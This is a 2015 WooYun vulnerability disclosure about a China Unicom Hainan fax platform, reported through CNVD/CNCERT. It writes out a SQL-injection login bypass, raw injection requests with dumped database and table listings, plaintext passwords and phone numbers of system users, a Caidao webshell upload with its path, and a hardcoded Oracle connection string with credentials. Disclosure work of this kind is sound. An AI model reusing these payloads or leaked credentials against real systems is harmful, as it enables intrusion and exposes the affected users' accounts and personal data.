当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132927

漏洞标题:中国联通海南省某传真平台多个漏洞(注入、上传等)

相关厂商:中国联通

漏洞作者: JulyTornado

提交时间:2015-08-12 14:28

修复时间:2015-09-26 15:04

公开时间:2015-09-26 15:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-12: 细节已通知厂商并且等待厂商处理中
2015-08-12: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

中国联通海南省某传真平台漏洞打包

详细说明:

**.**.**.**/fax/login.jsp
0x01 万能密码登录:
用户名填写admin' or '1'='1,密码随意,可成功登录:

clipboard.png


clipboard.png


0x02 SQL注入:
包括但不仅限于“人事档案管理-人员管理”等信息查询功能,存在SQL注入:

POST /emp/jxtEmployeeRst.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**/emp/jxtEmployee.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 172
DNT: 1
Host: **.**.**.**
Pragma: no-cache
Cookie: JSESSIONID=6902EAA62E8189BC91E17DA05C7B72B3
name=dfsf&sex=&cardid=&department=&nativeplace=&email=&m_tel=&folk=&h_tel=&title=&edulevel=&birth_date=&o_tel=&instime=&opempno=&butt=&rowId=&optFlag=&hidden2=&hidden3=&id=


name等参数存在SQL注入:

clipboard.png


工具验证结果:

clipboard.png


available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] LTJXT
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


可泄露大量敏感信息:

Database: LTJXT
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| URL_TRACE | 172615 |
| CS_DIALOUT_TEL | 52453 |
| CS_DIALOUT_DETAIL | 51752 |
| CS_DIALOUT_TASK | 47836 |
| CS_DIALOUT_OPERATE | 47754 |
| S_AFFIX | 44429 |
| JXT_TICKET | 42227 |
| JXT_DAYPAY | 36077 |
| FAX_SEND_D | 25805 |
| FAX_SEND_M | 22935 |
| FAX_SMSMSG | 22588 |
| JXT_TEAMRELA | 14579 |
| JXT_MONTHFREE | 13852 |
| TEMP_LOG | 10938 |
| JXT_WORKLOG | 6900 |
| FAX_RECEIVE | 5363 |
| FAX_RECEIVE_HIS | 3895 |
| JXT_EMPLOYEE | 3773 |
| JXT_MONTHPAY | 3769 |
| SMS_REVMSG | 2750 |
| SMS_SNDMSG_HIS | 1235 |
| JXT_GROUP_HIS | 1115 |
| SMS_MODEL | 846 |
| JXT_CUSTOMER | 619 |
| BM_TS_MSGCONTENT | 574 |
| FAX_TELNOCHECK | 539 |
| JXT_SYSUSER | 419 |
| JXT_GROUP | 368 |
| JXT_CALLINGCARD | 255 |
| JXT_PRV_ROLE | 245 |
| BM_TS_DOWN | 214 |
| JXT_SALE_MAN | 175 |
| JXT_DISTRUST | 161 |
| BM_LAWS | 160 |
| BM_ANSWER | 153 |
| LKF_WEBMAN | 134 |
| JXT_MENU | 88 |
| TEST_MENU | 88 |
| CSQ | 65 |
| SMS_SNDMSG_FAULT | 64 |
| BM_BMTS_CONTENT | 62 |
| JXT_SYSUSER_HIS | 59 |
| JXT_TEAM | 57 |
| JXT_MENU_PAN | 56 |
| JXT_MENU_TEST | 56 |
| JXT_MEMO | 54 |
| FAX_SEND_D_HIS | 48 |
| JXT_DEPARTMENT | 45 |
| JXT_SEAL | 42 |
| BM_TS_MENU | 32 |
| CS_DIALOUT_TIME | 30 |
| BM_LINK | 28 |
| SMS_D_TYPE | 28 |
| SMS_MODEL_HIS | 28 |
| JXT_RESGROUPID | 27 |
| JXT_SUBCOM | 25 |
| TMP_TICKET | 12 |
| JXT_ROLE | 9 |
| JXT_WORKFLOW | 9 |
| TEST_ROLE | 8 |
| FAX_CONTRAST_DETAIL | 7 |
| JXT_SMSTRANS | 7 |
| SMS_M_TYPE | 7 |
| SMS_MONTHRECKONING | 7 |
| SMS_SNDMSG | 7 |
| JXT_FEECODE | 4 |
| JXT_WORKCHECK | 4 |
| JXT_WORKFLOW_TYPE | 4 |
| CS_FAX_SYSTEM | 1 |
| FAX_AFFIX1 | 1 |
| JXT_GROUPID | 1 |
| JXT_SRCTEL | 1 |
| LKF_VERSION | 1 |
+---------------------+---------+


0x03 用户密码明文保存:

Database: LTJXT 
Table: JXT_SYSUSER
[2 entries]
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+
| GROUPID | SUBCOMID | NAME | MTEL | EMPNO | STATE | PASSWD | SMSTAB | SYSROLE | OPEMPNO | INSTIME | CRE_EMPNO |
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+
| 10041 | 30 | 13322063918 | NULL | 13322063918 | 0 | 444999 | NULL | 01 | SMS | | SMS |
| 10042 | 30 | 13307575890 | NULL | 13307575890 | 0 | 202020 | NULL | 50 | SMS | | SMS |
+---------+----------+-------------+------+-------------+-------+--------+--------+---------+---------+---------+-----------+


able: LKF_WEBMAN
[4 entries]
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
| SUBCOMID | SYSUSERID | SUPUSERID | FAX | NAME | ROLE | O_TEL | STATE | EMAIL | PASSWD | MOBTEL | INSTIME |
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+
| 01 | sys | NULL | NULL | | 0 | NULL | 0 | NULL | hnabc | 13322004434 | |
| 13 | qh01 | jt01 | NULL | | 1 | NULL | 0 | NULL | 123456 | 13322002698 | |
| 01 | ltsys | NULL | NULL | | 0 | NULL | 0 | NULL | UNICOM2005 | NULL | |
| 01 | cs | NULL | NULL | | 0 | 13322002325 | 0 | NULL | 123456 | 13322002325 | |
+----------+-----------+-----------+------+------+------+-------------+-------+-------+------------+-------------+---------+


0x04 任意文件上传:
包括但不仅限于“如意传真-新建传真”功能,可上传任意文件:

POST /fax/FaxSend/Upload_Fax_Affix.jsp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: **.**.**.**/fax/FaxSend/index.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7df15b3b60cde
Accept-Encoding: gzip, deflate
Content-Length: 7992
DNT: 1
Host: **.**.**.**
……
Content-Disposition: form-data; name="upload"; filename="D:\sectools\web\caidao-20141213\Customize\fckedit.jsp"
Content-Type: text/plain


clipboard.png


菜刀路径:
**.**.**.**/fax/affix/2015_08_09/20150809150809045200_2501.jsp

clipboard.png


菜刀成功执行,可能威胁内网安全:

clipboard.png


clipboard.png


0x05 Oracle数据库1521端口对外开放,可直接连接:

conn = DriverManager.getConnection("jdbc:oracle:thin:@localhost:1521:oradata", "ltjxt", "ltjxt");


clipboard.png

漏洞证明:

同一类型的多处漏洞就不全列出来了,举一反三吧。。。

修复方案:

阿弥陀佛

版权声明:转载请注明来源 JulyTornado@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-08-12 15:03

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给海南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无